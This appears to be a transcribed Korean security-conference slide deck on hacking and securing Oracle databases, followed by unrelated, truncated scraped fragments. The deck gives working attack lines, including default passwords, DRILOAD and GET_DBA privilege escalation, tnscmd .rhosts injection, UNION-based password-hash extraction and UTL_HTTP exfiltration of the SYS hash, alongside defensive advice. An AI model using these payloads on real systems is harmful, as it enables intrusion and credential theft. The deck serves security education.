Penetration Zone Open
|
|
- 덕 망절
- 5 years ago
- Views:
Transcription
1 Hacking and Securing Oracle OCT 주식회사모니터랩 By Coderant(
2 목 차 Chapter I. 개요 Chapter II. DB 보안 Chapter III. DB 해킹기법소개 Chapter IV. 결론
3 Chapter I. 개요 Agenda - 우리가잘모르고있는 DB 보안 - DB 서버의 Security Hole 에대한 Awareness - DB 서버를대상으로어떤방식으로해킹이되는지이해 - 안전한 Oracel Database 서버를위한기본적인 Idea - Computer Emergency Response Team(CERT) 에발표에의하면모든해킹의 95% 가알려진취약점을이용한다. - Deloitte 2005 Global Security Suvery 자료에의하면내부자에의한공격이외부자공격보다빈도가증가하고있다. - 궁극적으로 Database 서버의 Security Awareness 및효과적인보안대책을수립
4 Chapter I. 개요 What are the hackers trying to do - DB 를손상시키거나, 접근권한을획득하고자한다. - 잘못설정된 Configuration 는권한승계를허용한다. - 잘못설정된 Configuration 은비인가데이터에접근을허용한다. - 잘못설정된 Configuration 은손상 (Damage) 와비즈니스손실을가져온다. To protect Oracle thing like a hacker - Database 를보안에대해서먼저해커처럼생각하라 -Oracle 에서발생할수있는모든 Security Hole 및 Risk 를고려 Configuration, Permission, Bug
5 Chapter I. 개요 Main Security Problem - 인터넷액세스 : 디폴트로 DB 에서많은포트가 Open 되어있음 이는잠재적으로 MS SQL 의슬래머웜같은공격에취약할수있음 - Oracel TNS Listener 에대한해킹공격 (DoS) - Buggy 패키지의취약성을악용한해킹공격 ex) UTL_FILE, DBMS_BACKUP_RESTORE, EMD_SYSTEM, DBMS_LOB, DBMS_NAMESPACE, DBMS_SCHEDULER JAVA 등등 - 패키지 (Pakage)/Function/ 프로시저 (Procedure) 를악용 - Oracle 의디폴트패스워드문제 ex) 초당 1,100,000 hash 크랙가능 (2.8GHz 펜티엄 4 PC)
6 Chapter II. DB 보안 Oracle Network Architecture OSI OSI Network 모델모델
7 Chapter II. DB 보안 Oracle 에서구동되는프로세스 $ ps -ef grep oracle oracle :26:13? 0:00 ora_pmon_orasidsol oracle :26:16? 0:01 ora_smon_orasidsol oracle :26:17? 0:00 ora_reco_orasidsol oracle :26:15? 0:01 ora_dbw0_orasidsol oracle :26:16? 0:01 ora_lgwr_orasidsol oracle :26:16? 0:05 ora_ckpt_orasidsol oracle :30:59? 1:34 oracleorasidsol (LOCAL=NO) PMON 프로세스 : 프로세스모니터하는프로세스 SMON 프로세스 : 시스템모니터프로세스 (crash recovery) RECO 프로세스 : Distributed Transaction Recovery 프로세스 DBWR 프로세스 : Database Writer 프로세스 LGWR 프로세스 : Log Writer 프로세스, handling redo logs. CKPT 프로세스 : Checkpoint 프로세스
8 Chapter II. DB 보안 DBA 를가지는것들 SYS와 SYSTEM 모두 DBA 권한을가진계정이지만기타다른계정에서도 DBA 권한이부여되어있는경우가간혹있다.(MDSYS, CTXSYS, WKSYS, SYSMAN) SQL> select distinct a.name from sys.user$ a, sys.sysauth$ b where a.user#=b.grantee# and b.privilege#=4; NAME CTXSYS SYS SYSMAN SYSTEM WKSYS * Oracle 10g 에서는기본적으로제거되어있음
9 Chapter II. DB 보안 Oracle Role 과 Privilege 해커가관심있어하는중요한데이터베이스뷰 (DATABASE VIEW) 데이터베이스뷰 설명 (Description) DBA_USERS DB 안에있는사용자계정에대한정보 ( 패스워드포함 ) DBA_PROFILE DBA_ROLES DBA_ROLE_PRIVS DBA_SYS_PRIVS ROLE_SYS_PRIVS ROLE_ROLE_PRIVS USER_ROLE_PRIVS USER_SYS_PRIVS 각프로파일에대한리소스에관한정보 DB안에있는모든Role에대한모든상세한정보각사용자와기타 Role 부여되어있는권한 Role 정보각사용자와기타 Role 부여되어있는시스템권한 Role 정보다른 Role에부여되어있는시스템권한을보여줌다른 Role에부여되어있는 Role를보여줌현재사용자에부여되어있는 Role 정보를보여줌현재사용자에부여되어있는시스템권한정보를보여줌 * System Tablesspace : x$, $ 가붙은테이블 (v$fixed_table)
10 Chapter II. DB 보안 DB 오브젝트타입 Oracle 10g 에서는 Default 로, 41 개이상의오브젝트타입이있다
11 Chapter II. DB 보안 SYS 스키마정보와관련된것들 - 프로세스와세션정보는 SYS 스키마에 v$process 와 v$session 테이블에저장됨 - Oracle Intelligent Agent 는 TCP port 1748, 1808, 1809 사용 종종 dbsnmp SNMP 요청을 1161 번포트에서 Listening 한다. - Oracle 의디퐅트 SID 목록 Product Oracle XE Oracle 9i ~ 10g Oracel Default SID Oracle Enterprise Manager Repository BEA Weblogic SAP Standard System Open View 디폴트 SID XE IASDB ORCL OEMREP MSAM SA*, SID OPENVIEW, OVO
12 Chapter II. DB 보안 시스템권한 (System Privilege) SQL> select name from system_privilege_map; SYSTEM 그룹의권한 : ALTER ANY, CREATE ANY, EXECUTE ANY, ANALYZE, AUDIT, DEBUG, DELETE ANY, DROP ANY
13 Chapter III. DB 해킹기법 Oracle DB 보안취약점구분 1) Oracle의 extpro 와같은환경변수의악용 2) Network Protocol의인증결함 3) Authentication Protocol의결함 4) 비인가접근 - 안전하지않은 Oracel TNS Listener 포트에대한공격 5) Arbitrary Code Execution in Intrinsic SQL Elements 6) 잘못된사용 - SQL Injeciton, Dynamic PL/SQL Injection 7) 패키지의 SQL Injection 취약점 - DRILOAD.VALIDATE_STMT SQL Injection를통해권한상승 [ 예 Oracle 8i 취약점 ] SQL> exec CTXSYS.DRILOAD.VALIDATE_STMT( GRANT DBA TO PUBLIC );
14 Chapter III. DB 해킹기법 Oracle DB 해킹기법에대한 Summary 구분 사용자인증 네트워크서비스 상세해킹구현기법디폴트 DB 개정및패스워드 Password Cracking TNS Listener 포트 1521를통한해킹시도 Oracel Stadard 패키지 SQL Injection Injection Attack(Code Injection, PL/SQL Injection) Function Call Injection DBMS_SYS_SQL.PARSE_AS_USER 함수를이용하여악의적인 PL/SQL 만들어서실행할수있음 Un-Documented Un-documented initialisation parameter(init.ora) CURRENT SESSION (alter session set current_schema = yes)
15 Chapter III. DB 해킹기법 Default UserNamer 과 Password 로접속기본적으로 DB 설치시존재하는계정과패스워드를통한접근가능 아래에기술한것말고도디폴트계정 / 패스워드는많다. - SYS/CHANGE_ON_INSTALL - SYSTEM/MANAGER - DBSNMP/DBSNMP - CTXSYS/CTXSYS - MDSYS/MDSYS - SCOTT/TIGER
16 Chapter III. DB 해킹기법 Oracle DB 버전별 Without Authentication
17 Chapter III. DB 해킹기법 Oracle 의 Authentication 취약점 2006 년발표된 Critical 한 Oracle 취약점 ( 인증초기화세션시의 SQL 의조작을통한권한 DBA 권한상승 )
18 Chapter III. DB 해킹기법 SYSMAN 의 MGMT_VIEW 정보추출 VIEW_USERNAME, VIEW_PASSWORD 에서취약한 Encryption 패스워드추출 (Oracle 10g, 11g 에만해당됨 )
19 Chapter III. DB 해킹기법 Oracle Hash Password 크랙단순한패스워드는크랙하는데 1 초도걸리지않음
20 Chapter III. DB 해킹기법 TNS Listener Attack(1) - 가장쉬운 ORACLE 공격중하나는 Listener 를공격하는것 - TNS Denial of Sevices Attack - Oracel 9i/10g 에서 Listener 패스워드가설정되면 TNS 공격시에러가발생 년경에나왔던 Oracle 9i 의 Long Service_name 파라메터 오버플로우취약점 공격예 ) (DESCRIPTION= (ADDRESS=(PROTOCOL=TCP)(HOST= )(PORT=1521)) (CONNECT_DATA= (SERVICE_NAME=hacker_shellcode_goes_here) (CID=(PROGRAM=SQLPLUS.EXE) (HOST=foo)(USER=bar))))
21 Chapter III. DB 해킹기법 TNS Listener Attack(2) root% tnscmd status -h Target.com -p 1521 [TNS 패킷내용 ] sending (CONNECT_DATA=(COMMAND=status)) to Target.com:1521 writing 89 bytes reading `...j... (DESCRIPTION=(TMP=)(VSNNUM= )(ERR=0) (ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for.Sol aris:.version production)(start_date=01-sep :35:49)(SIDNUM=1)(LOGFILE=/u01/app/oracle/product/8. 1.6/network/log/listener.log)(PRMFILE=/u01/app/oracle/pro)
22 Chapter III. DB 해킹기법 TNS Listener Attack(3) rhost 파일에 + + 를 insert 시켜 rlogin 으로인증없이서버에접근 [ 해킹공격예 ] 1) root%./tnscmd --rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=) (USER=)(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTE NER)(VERSION= )(VALUE=/u01/home/oracle/.rhosts))) " -h oraclesvr2 2) root%./tnscmd --rawcmd " + + " -h oraclesvr2 3) root% rlogin -l oracle oraclesvr2 4) root% tnscmd10g.pl -h G --rawcmd "(CONNECT_DATA=((<here your pl/sql code to propagate>"
23 Chapter III. DB 해킹기법 Sniffing ALTER USER SQLNET.ORA 파일에다음내용을추가 TRACE_FILE_SERVER = oug.trc TRACE_DIRECTORY_SERVER =../tmp TRACE_LEVEL_SERVER = SUPPORT SQL > alter user scott identified by xdgeowvword; User altered
24 Chapter III. DB 해킹기법 SQL Injection SQL Injection Attack 분류 - SQL 구문조작 (Manipulation) - Code 삽입 (Injection) 오라클은 Dynamic SQL 형태에서는 Multi SQL Statement 를허용하지않는다.( 즉 ; 를허용하지않는다는의미 ) - Function Call 삽입 (Injection) - Buffer Overflow
25 Chapter III. DB 해킹기법 SQL Injection SQL 구문조작 Attack - Web 해킹을통한우편번호검색부분의 SQL 구문조작사례
26 Chapter III. DB 해킹기법 SQL Injection Code Injeciton Attack 444,'444'%20from%20sys.tab%20where%20tname%20not%20in%20('A0TMSRNES','A0T ORGTBL','A0TTBLSCM','A1TXMLINF','A4TCPADLG','BANK_THEME_DATA')--
27 Chapter III. DB 해킹기법 SQL Injection Oracle Worm(Voyager) 2005 년 11 월익명의제보자에의한 Oracle Voyager Worm 제보 - Voyager Worm 의구동 1) Grant DBA to public(ctxsys.driload 취약점 ) 2) Drop the trigger aa 3) Google 에다음과같은 URL 를요청함 Feeling+Lucky 4) 모든 Oracle 해시패스워드를 larry@oracle.com 주소로전송 5) Worm 이 listener.log 수정하고다음과같은명령어를 glogin.sql 에추가 "alter user mdsys identified by mdsys" 그리고 glogin.sql 실행 6) create database link 를생성하고패스워드추출시 (system/manager, sys/change_on_install, dbsnmp/dbsnmp, outln/outln, scott/tiger, mdsys/mdsys, ordcommon/ordcommon) 7) TNS listener 중지시킴
28 Chapter III. DB 해킹기법 SQL Injection Oracle 의 PL/SQL 의 Rootkit, 백도어 OracleRootkit.sql OracleBackdoor.sql
29 Chapter III. DB 해킹기법 SQL Injection Oracle PL/SQL Oracle Rootkit, 백도어 Rootkit, 백도어를이용하여 DB 서버로 Reverse 접속
30 Chapter III. DB 해킹기법 SQL Injection SQL Manipulation [ 정상쿼리 ] SELELCT * FROM users WHERE username = admin and password = xagg3 [SQL Query 조작사례 -1] SELELCT * FROM users WHERE username = admin and password = xagg3 or 1 = 1 [SQL Query 조작사례 -2] SELELCT product_name FROM all_product WHERE product_name LIKE = %LG UNIONr 1 = 1 SELECT username FROM dba_users WHERE username like %
31 Chapter III. DB 해킹기법 SQL Injection Code Injection [Code Injection 에러 ] SELELCT * FROM users WHERE username = admin and password = xagg3 ; DELETE FROM users Oracle 에서는 multiple SQL Statement 를지원하지않는다. 위와같은공격은실패한다. 따라서위와같은공격은 PL/SQL Block 공격으로가능 [Anonymous PL/SQL Block 에서공격 ] BEGIN ENCRYPTION_PASSWORD( admin and password= xagg3 ); DELETE FROM users WHERE upper(username) = upper( admin ); END;
32 Chapter III. DB 해킹기법 SQL Injection Function Call Injection Oracle 의패키지의 Function 이나사용자 Function 에서 SQL 구문을 Injection 시키는공격 Oracle 은 1000 개의 Function 과 175 개정도의기본패키지를지원함 [ 정상적인경우 ] SELELCT TRANSLATE( user input, ABCDEFGH IJKLMNOPQRSTUVWXYZ, ) FROM dual; [Function Call Injection 공격 ] SELELCT TRANSLATE( UTL_HTTP.REQUEST( / ) ABCDEFGHIJKLMNOPQRSTUVW XYZ, ) FROM dual;
33 Chapter III. DB 해킹기법 SQL Injection PL/SQL 에서의 SQL Injection 스토어드프로시저는 PL/SQL 나 JDBC 의 Callablestatement 둘중 에하나의형태로호출되어사용된다. PL/SQL 이실행되는 4 가지 Type - Embeded SQL Statement : Compiled, Bind Variable 만허용 - Static Cursors : Compiled, Bind Variable 만허용 - ECUTE IMMEDIATE : DBMS_SQL 를대체함 - DBMS_SQL 패키지 : Dynamic SQL 의옛날방식 간혹, EXECUTE IMMEDIATE 와 DBMS_SQL 를결합해서사용하는경우도있음.
34 Chapter III. DB 해킹기법 SQL Injection PL/SQL 의구성 PL/SQL 3 가지 Block Type - Anonymous, Procedure, Function
35 Chapter III. DB 해킹기법 SQL Injection EXECUTE IMMEDIATE 구문 (1) PL/SQL 코드안에서 Dynamic SQL 를실행시킴 예 ) SQL Injection 공격에취약한 execute immediate 구문 CREATE OR REPLACE PROCEDURE demo (name IN VARCHAR2) AS sqlstr VARCHAR2(1000); code VARCHAR2(100); BEGIN sqlstr := SELECT postal-code FROM state WHERE state-name = `` name ; EXECUTE IMMEDIATE sqlstr; END; State-name = :name; / Bind Variable 형태로하면 SQL Injection 공격을차단할수있다.
36 Chapter III. DB 해킹기법 SQL Injection EXECUTE IMMEDIATE 구문 (2) Anonymous PL/SQL Block 은 SQL Injection 공격에매우취약 예 ) SQL Injection 공격에취약한 execute immediate 구문 CREATE OR REPLACE PROCEDURE demo (name IN VARCHAR2) AS sqlstr VARCHAR2(1000); code VARCHAR2(100); BEGIN -- 취약한경우의코드 EXECUTE IMMEDIATE BEGIN updatepass ( value ); END ; -- 취약하지않은코드 cmd := BEGIN updatepass (:1); END ; EXECUTE IMMEDIATE cmd USING value; END; /
37 Chapter III. DB 해킹기법 SQL Injection Injecting Function - 만약 Attacker 가서버에서 function 을생성할수있다면악의적인 PL/SQL function 를만들어실행하거나 SQL 구문에 Injection 할수있다. - Attacker 가사용할함수는 AUTHID CURRENT_USER 키워드가설정되어있어야함 스토어드프로시저실행권한 (invoker, definer) 의상관없이접근권한은실행할때컴파일유저가아닌현재접속해있는유저 - AUTONOMOUS_TRANSACTION pragma 를설정해야함.
38 Chapter III. DB 해킹기법 SQL Injection Injecting Function - requisite privilege 로실행되어야 SCOTT 가 DBA Role 를획득하게된다. CREATE OR REPLACE FUNCTION GET_DBA RETURN VARCHAR AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; END; / GRANT EXECUTE ON GET_DBA TO PUBLIC; / LIST_LIBRARIES 프로시저가다음과같이실행되는것을의미한다. SELECT object_name FROM all_objects WHERE owner = 'ABC' SCOTT.GET_DBA() SQL> EXEC SYS.LIST_LIBRARIES('ABC'' SCOTT.GET_DBA()--'); PL/SQL procedure successfully completed.
39 Chapter III. DB 해킹기법 SQL Injection Injecting Function 사용자 Function 을통한 Privilege Escalation Oracle 10g 에서테스트한결 과 (Oracle CPU July 2006 패치되어더이상공격안됨 )
40 Chapter III. DB 해킹기법 SQL Injection Injecting Function CREATE OR REPLACE PROCEDURE LIST_LIBRARIES(P_OWNER VARCHAR2) AS TYPE C_TYPE IS REF CURSOR; CV C_TYPE; BUFFER VARCHAR2(200); BEGIN DBMS_OUTPUT.ENABLE( ); OPEN CV FOR 'SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OWNER = ''' P_OWNER ''' AND OBJECT_TYPE=''LIBRARY'''; LOOP FETCH CV INTO buffer; DBMS_OUTPUT.PUT_LINE(BUFFER); EXIT WHEN CV%NOTFOUND; END LOOP; CLOSE CV; END; / 만약 SQL Injection 취약점이존재한다면 P_OWNER 파라메터에 UNION SELECT 구문을삽입하는공격이가능하다. SQL> EXEC SYS.LIST_LIBRARIES('MDSYS'); ORDMD_IDX_LIBS ORDMD_REL_LIBS 정상적인쿼리 ORDMD_WD_LIBS ORDMD_MBR_LIBS ORDMD_UDT_LIBS EATE OR REPLACE PROCEDURE SQL> EXEC SYS.LIST_LIBRARIES('NOUSER'' UNION SELECT PASSWORD FROM DBA_USERS--'); 23F797F E EB547DBF 2A09F346B BE6F80744E08FEB SQL Injection 쿼리
41 Chapter III. DB 해킹기법 패키지취약점 패키지버그공격사례 - DBA 권한획득 SQL> select * from user_role_privs; USERNAME GRANTD_ROLE ADM DEF OS SCOTT CONNECT NO YES NO SCOTT RESORCE NO YES NO SQL> exec ctxsys.driload.validate_stmt( grant dba to scott ); BEGIN ctxsys.driload.validate_stmt( grant dba to scott ); END; * ERROR at line 1: ORA : PL/SQL: unhandled user-defined exeception ORA : at CTXSYS.DRILOAD, line 42 ORA : no statement parsed ORA : at line 1 SQL> select * from user_role_privs; USERNAME GRANTD_ROLE ADM DEF OS SCOTT CONNECT NO YES NO SCOTT DBA NO YES NO SCOTT RESORCE NO YES NO
42 Chapter III. DB 해킹기법 패키지취약점 UTL_HTTP 패키지보안 - UTL_HTTP 패키지는 Oracle DB 서버로 Out-of-band 커넥션을요청할수있게해준다. - SYS user 의패스워드를추출할수있다. - 기타 UTL_SMTP, UTP_TCP, UTP_FILE 패키지도버그가존재한다면이와같은악의적인공격이가능하다. 공격예제 ) SELECT utl_http.request(' (SELECT password FROM dba_users WHERE username='sys')) FROM dual;
43 Chapter III. DB 해킹기법 패키지취약점 UTL_HTTP.REQUEST 패키지취약점 - UTL_HTTP.REQUEST 는 SQL injection 하는데특별히용이 ex) FOO 파라메터에 SQL Injection 취약점이존재할경우공격은다음과같이이루어진다. utl_http.request( :5500/' (SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) 'BAR 다른오라클네트워크패키지에서도다양하게사용될수있다. (UTL_MAIL, UTL_SMTP, UTL_INADDR)
44 Chapter III. DB 해킹기법소개 오라클 DB Link 공격 SQL> create database link remote_db connect to scott identified by tiger using '(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp) (HOST= )(PORT=1521))(CONNECT_DATA= (SERVICE_NAME=sparc10g)))'; Database link 가생성되며 link 로다음과같이쿼리를실행할수있다. DB Link 된서버로연결되고 ALL_USERS table 쿼리가능하다 ex) SQL>SELECT USERNAME FROM
45 Chapter III. DB 해킹기법소개 Oracel 버전별취약점 ORACEL 취약점발표는 2006 년 ~ 2007 년기준 구분상세분류 Impact ORACEL 8i (2005 년기준 ) ORACLE 9i ORACLE 10g CTXSYS.DRILOAD의 SQL Injection 취약점 DBMS_SYSTEM.KSDWRT의버퍼오버플로우 Create Database Link 버퍼오버플로우다양한파일파라메터버퍼오버플로우 DBMS_REPCAT_FGT의버퍼오버플로우 DBMS_REPCAT_ADMIN의버퍼오버플로우 DBMS_REPCAT의버퍼오버플로우 UTL_FILE을통한 Directory Traversal DBMS_SYS_SQL을통한DBA 권한획득 dbms_export_extension의 SQL Injection Views와 outer joins을통한 Privilege escalation DBMS_XMLSCHEMA_INT 버퍼오버플로우 KUPW$WORKER의 SQL Injection dbms_export_extension의 SQL Injection Become DBA Crash Database Crash Database Crash Database / Execute Code Crash Database / Execute Code Crash Database / Execute Code Crash Database / Execute Code Become DBA Become DBA Become DBA Become DBA Create Remote Shell Become DBA Become DBA
46 Chapter III. DB 해킹기법소개 Oracel 버전별취약점 ORACEL 취약점발표는 2006 년 ~ 2007 년기준 구분상세분류 Impact ORACEL 10g KUPV$FT의 SQL Injection Local Privilege Escalation (win32) KUPM$MCP의 SQL Injection KUPW$WORKER의 SQL Injection KUPV$FT의 SQL Injection Local Privilege Escalation (win32) KUPM$MCP의 SQL Injection Become DBA via cursor Become DBA Become DBA via cursor Become DBA via cursor Become DBA via cursor Become DBA Become DBA via cursor
47 Chapter III. DB 해킹기법소개 주기적인 Role/Priviledge 진단테스트
48 Chapter IV. 결론 대응방안 - 보안의궁극적인목적은 Database 에있는데이터를보호하기위한것이다. - Web 보안은지속적인점검과대비를하지않으면언제라도보안취약점을이용한해커의공격을받을수있다. - 사용자는꼭필요한최소권한 (least privilege) 만을부여 - Public 은오라클데이터베이스의모든사용자에게디폴트로적용되기때문에 Public 사용자그룹에서불필요한권한을제거 - 모든사용자는 Public 에권한부여 (Privilege grant) 여부점검 - PL/SQL 패키지를실행시켜보낼자신에게권한부여된권한범위를넘어서는작업을할수도있을것이다.
49 감사합니다
Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More information13주-14주proc.PDF
12 : Pro*C/C++ 1 2 Embeded SQL 3 PRO *C 31 C/C++ PRO *C NOT! NOT AND && AND OR OR EQUAL == = SQL,,, Embeded SQL SQL 32 Pro*C C SQL Pro*C C, C Pro*C, C C 321, C char : char[n] : n int, short, long : float
More informationI T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r
I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r -------------------------------------------------------------------- -- 1. : ts_cre_bonsa.sql -- 2. :
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More information목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate
ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition
More information목차 BUG 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG ROLLUP/CUBE 절을포함하는질의는 SUBQUE
ALTIBASE HDB 6.3.1.10.1 Patch Notes 목차 BUG-45710 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG-45730 ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG-45760 ROLLUP/CUBE 절을포함하는질의는 SUBQUERY REMOVAL 변환을수행하지않도록수정합니다....
More information90
89 3 차원공간질의를위한효율적인위상학적데이터모델의검증 Validation of Efficient Topological Data Model for 3D Spatial Queries Seokho Lee Jiyeong Lee 요약 키워드 Abstract Keywords 90 91 92 93 94 95 96 -- 3D Brep adjacency_ordering DECLARE
More informationThe Self-Managing Database : Automatic Health Monitoring and Alerting
The Self-Managing Database : Automatic Health Monitoring and Alerting Agenda Oracle 10g Enterpirse Manager Oracle 10g 3 rd Party PL/SQL API Summary (Self-Managing Database) ? 6% 6% 12% 55% 6% Source: IOUG
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More informationALTIBASE HDB Patch Notes
ALTIBASE HDB 6.5.1.5.6 Patch Notes 목차 BUG-45643 암호화컬럼의경우, 이중화환경에서 DDL 수행시 Replication HandShake 가실패하는문제가있어수정하였습니다... 4 BUG-45652 이중화에서 Active Server 와 Standby Server 의 List Partition 테이블의범위조건이다른경우에 Handshake
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More information목차 BUG DEQUEUE 의 WAIT TIME 이 1 초미만인경우, 설정한시간만큼대기하지않는문제가있습니다... 3 BUG [qp-select-pvo] group by 표현식에있는컬럼을참조하는집합연산이존재하지않으면결괏값오류가발생할수있습니다... 4
ALTIBASE HDB 6.5.1.5.10 Patch Notes 목차 BUG-46183 DEQUEUE 의 WAIT TIME 이 1 초미만인경우, 설정한시간만큼대기하지않는문제가있습니다... 3 BUG-46249 [qp-select-pvo] group by 표현식에있는컬럼을참조하는집합연산이존재하지않으면결괏값오류가발생할수있습니다... 4 BUG-46266 [sm]
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information단계
본문서에서는 Tibero RDBMS 에서제공하는 Oracle DB Link 를위한 gateway 설치및설정방법과 Oracle DB Link 사용법을소개한다. Contents 1. TIBERO TO ORACLE DB LINK 개요... 3 1.1. GATEWAY 란... 3 1.2. ORACLE GATEWAY... 3 1.3. GATEWAY 디렉터리구조...
More informationMySQL-Ch10
10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,
More informationMS-SQL SERVER 대비 기능
Business! ORACLE MS - SQL ORACLE MS - SQL Clustering A-Z A-F G-L M-R S-Z T-Z Microsoft EE : Works for benchmarks only CREATE VIEW Customers AS SELECT * FROM Server1.TableOwner.Customers_33 UNION ALL SELECT
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More information62
2 instance database physical storage 2 1 62 63 tablespace datafiles 2 2 64 1 2 logical view control files datafiles redo log files 65 2 3 9i OMF Oracle Managed Files, OMF 9i 9i / / OMF 9i 66 8 1MB 8 10MB
More information목 차
Oracle 9i Admim 1. Oracle RDBMS 1.1 (System Global Area:SGA) 1.1.1 (Shared Pool) 1.1.2 (Database Buffer Cache) 1.1.3 (Redo Log Buffer) 1.1.4 Java Pool Large Pool 1.2 Program Global Area (PGA) 1.3 Oracle
More information最即時的Sybase ASE Server資料庫診斷工具
TOAD 9.5 Toad Oracle 料 SQL 料 行 理 SQLprofile Quest Software 了 Oracle -Toad Tools of Oracle Application Developers Toad 了 DBA DBA 理 易 度 Toad 料 SQL PL/SQL Toad Oracle PL/SQL Toad Schema Browser Schema Browser
More information세미나(장애와복구-수강생용).ppt
DB PLAN Consultant jina6678@yahoo.co.kr 011-864-1858 - - 1. 2. DB 3. - 4. - 5. 6. 1 INSTANCE MMAN RECO RFS MRP ORBn RBAL MMON Dnnn Snnn Data Buffer Cache SGA Stream Pool Shared pool Large Pool PGA Log
More information歯sql_tuning2
SQL Tuning (2) SQL SQL SQL Tuning ROW(1) ROW(2) ROW(n) update ROW(2) at time 1 & Uncommitted update ROW(2) at time 2 SQLDBA> @ UTLLOCKT WAITING_SESSION TYPE MODE_REQUESTED MODE_HELD LOCK_ID1
More informationChapter 1
3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More informationPCServerMgmt7
